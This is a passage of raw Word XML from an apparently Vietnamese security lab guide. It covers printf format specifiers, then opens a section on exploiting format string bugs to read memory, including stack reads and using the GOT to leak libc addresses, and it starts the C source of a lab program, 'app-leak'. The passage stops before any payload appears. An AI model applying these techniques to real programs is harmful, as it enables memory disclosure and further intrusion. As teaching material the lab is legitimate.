              <w:t xml:space="preserve">luôn </w:t>
            </w:r>
            <w:r w:rsidR="009A4E89">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">hiển thị </w:t>
            </w:r>
            <w:r w:rsidR="0075619A">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="009A4E89">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> chữ số thập phân.</w:t>
            </w:r>
            <w:r w:rsidR="3EA2B276" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nếu số chữ số</w:t>
            </w:r>
            <w:r w:rsidR="00A90D77">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="3EA2B276" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>không đủ, nó sẽ đệm khoảng trắng</w:t>
            </w:r>
            <w:r w:rsidR="006B60A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> ở phần nguyên</w:t>
            </w:r>
            <w:r w:rsidR="3EA2B276" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33C2681D" w14:textId="77777777" w:rsidR="00647D18" w:rsidRPr="00A56F03" w:rsidRDefault="00647D18" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00647D18" w14:paraId="48889BEA" w14:textId="77777777" w:rsidTr="00BE6C21">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6799" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E20FEDC" w14:textId="624A0DE8" w:rsidR="3EA2B276" w:rsidRPr="009060A7" w:rsidRDefault="00441F34" w:rsidP="009060A7">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:ind w:left="314" w:hanging="283"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>In ra 1 số thực, trong đó đ</w:t>
            </w:r>
            <w:r w:rsidR="3EA2B276" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">ầu ra sẽ chiếm ít nhất 7 </w:t>
            </w:r>
            <w:r w:rsidR="005D2709">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">ký tự </w:t>
            </w:r>
            <w:r w:rsidR="002128AF">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">và </w:t>
            </w:r>
            <w:r w:rsidR="00A9349C">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">luôn hiển thị </w:t>
            </w:r>
            <w:r w:rsidR="0075619A">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="002128AF">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> chữ số thập phân.</w:t>
            </w:r>
            <w:r w:rsidR="002128AF" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nếu số chữ số không đủ, nó sẽ đệm </w:t>
            </w:r>
            <w:r w:rsidR="002128AF">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>ký tự 0</w:t>
            </w:r>
            <w:r w:rsidR="006B60A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> ở phần nguyên</w:t>
            </w:r>
            <w:r w:rsidR="002128AF" w:rsidRPr="009060A7">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2731" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73B6D7FB" w14:textId="77777777" w:rsidR="00647D18" w:rsidRPr="00A56F03" w:rsidRDefault="00647D18" w:rsidP="00BE6C21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63014DE1" w14:textId="4A80A659" w:rsidR="00CD4165" w:rsidRDefault="00CD4165" w:rsidP="00CD4165">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Sinh viên có thể tham khảo thêm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B2DA5" w14:textId="3321CF6E" w:rsidR="00CD4165" w:rsidRDefault="006B60A7" w:rsidP="00CD4165">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00CD4165" w:rsidRPr="00AD3FAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Printf_format_string</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0661D023" w14:textId="104827AD" w:rsidR="00CD4165" w:rsidRDefault="006B60A7" w:rsidP="00CD4165">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00CD4165" w:rsidRPr="00AD3FAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cplusplus.com/reference/cstdio/printf/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD4165">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD32D8" w14:textId="02146207" w:rsidR="00647D18" w:rsidRPr="00DB1F52" w:rsidRDefault="00647D18" w:rsidP="00647D18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Khai thác lỗ hổng format string</w:t>
      </w:r>
      <w:r w:rsidR="00584D12">
        <w:t xml:space="preserve"> để đọc dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E651FDF" w14:textId="7C4C05C8" w:rsidR="00DB1F52" w:rsidRDefault="00647D18" w:rsidP="00D4037B">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="0068542D">
        <w:t xml:space="preserve">chuỗi định dạng </w:t>
      </w:r>
      <w:r>
        <w:t>format string có thể bị khai thác nhằm gây ra các tác động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE86E05" w14:textId="7B1840C4" w:rsidR="00D4037B" w:rsidRDefault="00D4037B" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Làm </w:t>
      </w:r>
      <w:r w:rsidR="00647D18">
        <w:t>crash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chương trình</w:t>
      </w:r>
      <w:r w:rsidR="006D3256">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA859B" w14:textId="6467766A" w:rsidR="006D3256" w:rsidRDefault="0068542D" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc các nội dung từ bộ nhớ (từ stack hoặc tại 1 địa chỉ nhất định)</w:t>
      </w:r>
      <w:r w:rsidR="008C18A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70A3FB" w14:textId="5F2A836C" w:rsidR="002C3589" w:rsidRDefault="0068542D" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Phần này sẽ hướng tới khai thác lỗ hổng format string để đọc dữ liệu từ bộ nhớ, trong đó có 2 vị trí có thể đọc dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F143A6" w14:textId="5FBD5F3E" w:rsidR="002C3589" w:rsidRDefault="0068542D" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dữ liệu trong</w:t>
      </w:r>
      <w:r w:rsidR="002C3589">
        <w:t xml:space="preserve"> ngăn xếp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - stack</w:t>
      </w:r>
      <w:r w:rsidR="002C3589">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04810EDC" w14:textId="1DAF4B6B" w:rsidR="002C3589" w:rsidRDefault="0068542D" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Đọc</w:t>
      </w:r>
      <w:r w:rsidR="00856770">
        <w:t xml:space="preserve"> giá trị của một biến</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA950C0" w14:textId="29D6E040" w:rsidR="00856770" w:rsidRDefault="00856770" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> bộ nhớ tương ứng với địa chỉ của một biến</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFDE73C" w14:textId="2B404A86" w:rsidR="00856770" w:rsidRDefault="0068542D" w:rsidP="00585DA3">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dữ liệu tại 1</w:t>
      </w:r>
      <w:r w:rsidR="003C7C75">
        <w:t xml:space="preserve"> địa chỉ tuỳ ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E15024" w14:textId="7C39C395" w:rsidR="003C7C75" w:rsidRDefault="008B0EB3" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Sử dụn</w:t>
      </w:r>
      <w:r w:rsidR="0068542D">
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bảng GOT để lấy địa chỉ hàm libc, sau đó lấy libc, rồi lấy địa chỉ của các hàm libc khác</w:t>
      </w:r>
      <w:r w:rsidR="0068542D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A860B8" w14:textId="5E59A8D6" w:rsidR="008B0EB3" w:rsidRDefault="008B0EB3" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="007B5832">
        <w:t>ump chương trình</w:t>
      </w:r>
      <w:r w:rsidR="00577E2E">
        <w:t xml:space="preserve"> lấy thông ti</w:t>
      </w:r>
      <w:r w:rsidR="0068542D">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00577E2E">
        <w:t xml:space="preserve"> hữu ích</w:t>
      </w:r>
      <w:r w:rsidR="0068542D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A199B98" w14:textId="6C0CF53E" w:rsidR="00577E2E" w:rsidRDefault="0068542D" w:rsidP="00577E2E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Đọc dữ liệu trong</w:t>
      </w:r>
      <w:r w:rsidR="00577E2E">
        <w:t xml:space="preserve"> ngăn xếp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24236921" w14:textId="6F2117FD" w:rsidR="0068542D" w:rsidRPr="0068542D" w:rsidRDefault="0068542D" w:rsidP="0068542D">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quan sát mã nguồn C của chương trình </w:t>
      </w:r>
      <w:r w:rsidR="00A61CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-leak.</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458"/>
        <w:gridCol w:w="9072"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F87E2F" w14:paraId="18F6D5A5" w14:textId="77777777" w:rsidTr="00C854B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="421A25D3"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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423BA59F"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A305CC"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F676198"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55E2EBC3"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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27180229"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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B55323"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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4401BDAF" w14:textId="77777777" w:rsidR="00F87E2F" w:rsidRP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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4CB574" w14:textId="77777777" w:rsidR="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1CB644" w14:textId="388CB88F" w:rsidR="002460FF" w:rsidRPr="00F87E2F" w:rsidRDefault="002460FF" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED2EB13" w14:textId="78909122" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="cp"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>#include</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="cpf"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;stdio.h&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9104EE" w14:textId="77777777" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="kt"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="nf"/>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4273FB2E" w14:textId="77777777" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="kt"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>char</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="478E05C0" w14:textId="7677E3A8" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="kt"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="mh"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0x22222222</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="n"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="o"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="w"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="mi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="00F87E2F">
              <w:rPr>
                <w:rStyle w:val="p"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7F71A4" w14:textId="70659CF7" w:rsidR="00F87E2F" w:rsidRPr="00F87E2F" w:rsidRDefault="00F87E2F" w:rsidP="0073446F">
            <w:pPr>
              <w:pStyle w:val="Code"/>
